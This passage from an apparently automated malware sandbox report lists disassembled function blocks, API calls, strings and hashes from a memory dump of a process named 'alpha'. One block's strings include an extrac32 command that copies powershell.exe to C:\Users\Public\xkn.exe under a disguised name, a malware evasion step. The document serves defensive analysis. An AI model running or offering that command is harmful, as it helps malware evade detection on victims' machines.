                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                    • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                    • API String ID: 2348642995-441775793
                                                                                                                    • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                    • Instruction ID: e0ffeab5e23f611bdaec064cabd414c1e91449732b3c622d12e21bab0db80ec3
                                                                                                                    • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                    • Instruction Fuzzy Hash: A2714C66908A4EC6E7606F25D458179FBB0FB49F86BA4D031FA4E07294EF3CA584C721
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                    • String ID: FAT$~
                                                                                                                    • API String ID: 2238823677-1832570214
                                                                                                                    • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                    • Instruction ID: 10361289db565988b95963b3c50e796af931ba634445a1ff057d7485720759a1
                                                                                                                    • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                    • Instruction Fuzzy Hash: EA718232608BC5CAEB61DF21D8542E9BBB0FB85B8AF904435DA4D4BB58DF38D245C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCD884
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCD89D
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCD94D
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCD964
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BCDB89
                                                                                                                    • wcstol.MSVCRT ref: 00007FF789BCDBDF
                                                                                                                    • wcstol.MSVCRT ref: 00007FF789BCDC63
                                                                                                                    • memmove.MSVCRT ref: 00007FF789BCDD33
                                                                                                                    • memmove.MSVCRT ref: 00007FF789BCDE9A
                                                                                                                    • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCDF1F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1051989028-0
                                                                                                                    • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                    • Instruction ID: 620fe1f0481a802bde5db5a133ae808c5e8271b5605cae52275d4ae6e282a1b9
                                                                                                                    • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                    • Instruction Fuzzy Hash: 0E028576A0978981EB346F15E44027AFAB4FB84FAAFA54131DA8D07B94DF3CE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                    • API String ID: 3223794493-3086019870
                                                                                                                    • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                    • Instruction ID: 7a4f48906e7680afa63cd558767df5f8d03962b7ec9396b60b2650650457d675
                                                                                                                    • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                    • Instruction Fuzzy Hash: D1517025A0874686FA54AF25E414179BFB0FF49FA6FA85135CA1E077A0EF3DE441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF789BEC6DB), ref: 00007FF789BD58EF
                                                                                                                      • Part of subcall function 00007FF789BD081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD084E
                                                                                                                    • towupper.MSVCRT ref: 00007FF789BEC1C9
                                                                                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BEC31C
                                                                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF789BEC5CB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                    • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe $x
                                                                                                                    • API String ID: 2242554020-3085501545
                                                                                                                    • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                    • Instruction ID: acd80c84ed447d8ce8093471f08e560017477ad26b6d883fd0ea6b3999c3f124
                                                                                                                    • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                    • Instruction Fuzzy Hash: A0129221A1864A81EA60BF25A80417EEBB4FF44FA6FE45235D95E037E0DF3DE941C724
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                    • String ID: \\.\
                                                                                                                    • API String ID: 799470305-2900601889
                                                                                                                    • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                                    • Instruction ID: 7d4a9dae0f473802c2367fec0bc2624c985a7c7b6a0e1277e4d02361d849760c
                                                                                                                    • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                                    • Instruction Fuzzy Hash: C751A532A18A8A89EB60AF11A8442F9BBB0FF85F96FA54535DA0D07794DF3CD545C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1944892715-0
                                                                                                                    • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                    • Instruction ID: ea63864cdbf43b2a0a6f4a54a247be4dcaaf62a3fe3ac2100aac10eb250a482f
                                                                                                                    • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                    • Instruction Fuzzy Hash: EBB16021A0964A86EA64BF11A454179FEB0FF95FA7FE48439CA4E47791EF3CE440C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BC54DE
                                                                                                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BC552B
                                                                                                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BC554F
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE345F
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BE347E
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BE34C3
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE34DB
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BE34FA
                                                                                                                      • Part of subcall function 00007FF789BD36EC: _get_osfhandle.MSVCRT ref: 00007FF789BD3715
                                                                                                                      • Part of subcall function 00007FF789BD36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF789BD3770
                                                                                                                      • Part of subcall function 00007FF789BD36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD3791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1356649289-0
                                                                                                                    • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                    • Instruction ID: ae1d17771738e61ca2a0b7b6200fa4eddbea41148d7f1a74604fc63e96c6ab9a
                                                                                                                    • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                    • Instruction Fuzzy Hash: C8915F32A0864A97EA14AF25A40417DFBF5FB89F96FA44139DA4E43795DF3CE440CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                    • String ID: %s$/-.$:
                                                                                                                    • API String ID: 1644023181-879152773
                                                                                                                    • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                    • Instruction ID: 4764e5d2ba008fde952baebc2dfd97bddb6c85fe70738d9461bcd208d9c46411
                                                                                                                    • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                    • Instruction Fuzzy Hash: 0A91B062A08A4E91EF50AF60D4442BEEBB4FF84F96FE44135DA4E426D4EE3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BE7251), ref: 00007FF789BE628E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSingleWait
                                                                                                                    • String ID: wil
                                                                                                                    • API String ID: 24740636-1589926490
                                                                                                                    • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                    • Instruction ID: d8b0549a18cb4b3e97e94c7229933dc549111150a9124726dece50ec1bbe8ef1
                                                                                                                    • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                    • Instruction Fuzzy Hash: 05414E21A0854AC3F3206F15E40427DAEB5FF85F92FB08131E90A87A94DF3DE844C621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                    • String ID: $Application$System
                                                                                                                    • API String ID: 3377411628-1881496484
                                                                                                                    • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                    • Instruction ID: db9309a95da8677b2174458f3abc41395e5259ef81aad2885ecde66dcbdc8c36
                                                                                                                    • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                    • Instruction Fuzzy Hash: 13415B32B08B469AE710AF60E8403EDBBB5FB89B49F945135DA4E43B58EF38D145C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                    • String ID: :$\
                                                                                                                    • API String ID: 3961617410-1166558509
                                                                                                                    • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                    • Instruction ID: 6586388e420d2d36679d5b4b8182bdf1d2b707fbe51274eb925d89f843d4db35
                                                                                                                    • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                    • Instruction Fuzzy Hash: 83215322B0CA4A96E7506F60A444079FEB1FF89FA6BE48535D91F43790EF3CE445C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
